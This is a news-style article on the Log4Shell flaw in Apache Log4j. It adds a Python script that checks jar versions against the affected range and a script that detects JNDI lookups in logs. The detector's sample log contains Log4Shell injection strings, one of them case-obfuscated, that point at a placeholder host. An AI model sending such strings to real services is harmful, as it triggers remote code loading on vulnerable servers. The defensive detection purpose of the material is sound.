Time and again, new exploits emerge and prove how damaging they can be in the wrong hands. The situation is even more critical when the exploit is a zero-day. The latest one has been discovered in Apache’s Log4j logging library. A proof-of-concept exploit has been shared online. It reveals the true potential of remote code execution attacks, and it has affected some of the largest services on the web. The vulnerability has been identified as “actively being exploited”, carries the “Log4Shell” moniker, and is one of the most dangerous to be made public in recent years. It can affect basically everything from Apple devices to simple apps and games like Minecraft.
For those unaware, Log4j is a popular Java-based logging package developed by the Apache Software Foundation. The vulnerability is tracked as CVE-2021-44228 and affects all versions of Log4j from 2.0-beta9 through 2.14.1. It has been patched in the most recent release of the library, version 2.15.0. However, many services and applications currently rely on Log4j, from Apple devices to games like Minecraft. Cloud services such as Steam and Apple iCloud are also on the list of vulnerable, and we assume the same goes for everyone using Apache Struts. Even changing an iPhone’s name can trigger the vulnerability on Apple’s servers.
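The practical first step for a defender is finding out which Log4j builds are actually deployed. The script below is an added example (not code from the article or from the Apache project) that reads the log4j-core version Maven records inside a jar and classifies it against the range stated above: 2.0-beta9 through 2.14.1 affected, 2.15.0 fixed. The `pom.properties` path is the standard Maven layout; the jar used to exercise it is a constructed fixture, not a real Log4j artifact.

```python
"""Classify log4j-core jars against the affected range named in the article.

Added example, not code from the article or the Apache project. It assumes
the ranges stated above: log4j-core 2.0-beta9 up to and including 2.14.1 is
affected by CVE-2021-44228, and 2.15.0 carries the fix.
"""
import io
import re
import zipfile

# Maven writes this file into every jar it builds; it names the artifact version.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIRST_AFFECTED = "2.0-beta9"
FIXED_IN = "2.15.0"


def parse_version(v):
    """Turn '2.14.1' or '2.0-beta9' into a sortable tuple.

    A pre-release tag sorts before the final release with the same numbers,
    so 2.0-beta9 < 2.0 < 2.0.1.
    """
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?", v.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {v!r}")
    major, minor, patch, tag, tagnum = m.groups()
    nums = (int(major), int(minor), int(patch or 0))
    # Final releases get a sentinel of 1 so they sort after any pre-release (0).
    pre = (0, {"alpha": 0, "beta": 1, "rc": 2}[tag], int(tagnum)) if tag else (1, 0, 0)
    return nums + pre


def is_affected(version):
    """True when FIRST_AFFECTED <= version < FIXED_IN."""
    v = parse_version(version)
    return parse_version(FIRST_AFFECTED) <= v < parse_version(FIXED_IN)


def log4j_core_version(jar_bytes):
    """Read the log4j-core version recorded by Maven inside a jar, or None."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        if POM_PROPERTIES not in jar.namelist():
            return None
        for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            key, sep, value = line.partition("=")
            if sep and key.strip() == "version":
                return value.strip()
    return None


def build_fake_jar(version):
    """Constructed test fixture: a minimal jar carrying only pom.properties."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(
            POM_PROPERTIES,
            f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n",
        )
    return buf.getvalue()


def audit(jar_bytes):
    """Return 'affected', 'fixed' or 'not-log4j-core' for one jar."""
    version = log4j_core_version(jar_bytes)
    if version is None:
        return "not-log4j-core"
    return "affected" if is_affected(version) else "fixed"


if __name__ == "__main__":
    for v in ("2.0-beta9", "2.14.1", "2.15.0", "2.0-beta8"):
        print(v, audit(build_fake_jar(v)))
```

The version parser treats pre-release tags explicitly, because a naive string comparison would place `2.0-beta9` after `2.0`. On a real host you would feed `audit()` the bytes of each jar found on disk; this example does not descend into nested jars inside fat jars or WAR files, which is where many deployments actually carry log4j-core.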
Chen Zhaojun of the Alibaba Cloud Security Team was the first to report this issue. According to the report, any service that logs user-controlled strings is currently vulnerable to the exploit. Logging user-controlled strings is a common practice among system administrators: it helps spot potential platform abuse, and it is also used when cleaning user input to ensure nothing harmful reaches the software.
A simple action like changing iPhone’s name can trigger the Log4Shell exploit
The exploit carries the “Log4Shell” moniker because it is an unauthenticated RCE vulnerability that allows for total system takeover. There’s already a proof-of-concept exploit online, and it is ridiculously easy to demonstrate that it works through the use of DNS logging software.
As per a quote from Bleeping Computer, ransomware actors will begin leveraging this vulnerability immediately. In fact, malicious actors are already mass-scanning the web trying to find servers to exploit, much as they did with other high-profile vulnerabilities such as Heartbleed and Shellshock. Worth noting that, according to LunaSec, some Java versions newer than 6u211, 7u201, 8u191, and 11.0.1 are in theory less affected, though hackers may still be able to work around the limitations.
As mentioned above, one can trigger Log4Shell simply by changing an iPhone’s name. Moreover, if a Java class is appended to the end of the URL, that class will be injected into the server process.
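Because the trigger is a user-controlled string that reaches a log statement, the defensive counterpart is to search existing logs for the lookup expression a vulnerable Log4j would have evaluated. The following is an added example, not code from the article: it flags access-log lines carrying a Log4j `jndi` lookup, the expression at the heart of CVE-2021-44228. It also flattens the `${lower:…}`/`${upper:…}` wrappers that Log4j resolves inside-out, so a detector that only matches the literal text does not miss case-mangled variants. The log lines, addresses and hostnames are constructed for the example.

```python
"""Flag log entries that carry a Log4j jndi lookup expression.

Added example, not from the article. It assumes the shape of the attack the
article describes: an attacker-controlled string (here, the User-Agent field
of a constructed access log) that a vulnerable Log4j would evaluate when the
request is logged. Log4j lookups are written `${name:...}` and may nest.
"""
import re

# Log4j resolves nested lookups inside-out, so simple case-changing wrappers
# are flattened before the lookup name is inspected.
_WRAPPER = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def flatten_lookups(s, max_rounds=10):
    """Replace ${lower:x}/${upper:x} with x in the requested case, repeatedly."""
    for _ in range(max_rounds):
        new = _WRAPPER.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            s,
        )
        if new == s:
            break
        s = new
    return s


def has_jndi_lookup(s):
    """True when the (flattened) string contains a jndi lookup."""
    return bool(_JNDI.search(flatten_lookups(s)))


# Constructed sample lines in combined log format; hosts and paths are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:13:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:13:01:05 +0000] "GET /login HTTP/1.1" 200 77 "-" "${jndi:ldap://example.invalid/a}"
203.0.113.9 - - [10/Dec/2021:13:01:06 +0000] "GET /login HTTP/1.1" 200 77 "-" "${${lower:j}ndi:dns://example.invalid/a}"
198.51.100.4 - - [10/Dec/2021:13:02:00 +0000] "GET /search?q=price${dollar} HTTP/1.1" 200 77 "-" "curl/7.79"
"""


def flag_lines(log_text):
    """Return (line_number, client_ip) for every line carrying a jndi lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if has_jndi_lookup(line):
            hits.append((n, line.split(" ", 1)[0]))
    return hits


if __name__ == "__main__":
    for n, ip in flag_lines(SAMPLE_LOG):
        print(f"line {n}: jndi lookup from {ip}")
```

The last sample line shows why the check looks for the `jndi` lookup specifically rather than any `${`: benign query strings can legitimately contain `${…}` text. A hit in historical logs does not prove compromise, only that an exploitation attempt reached a log statement, so the useful follow-up is checking whether the logging host ran an affected log4j-core at the time.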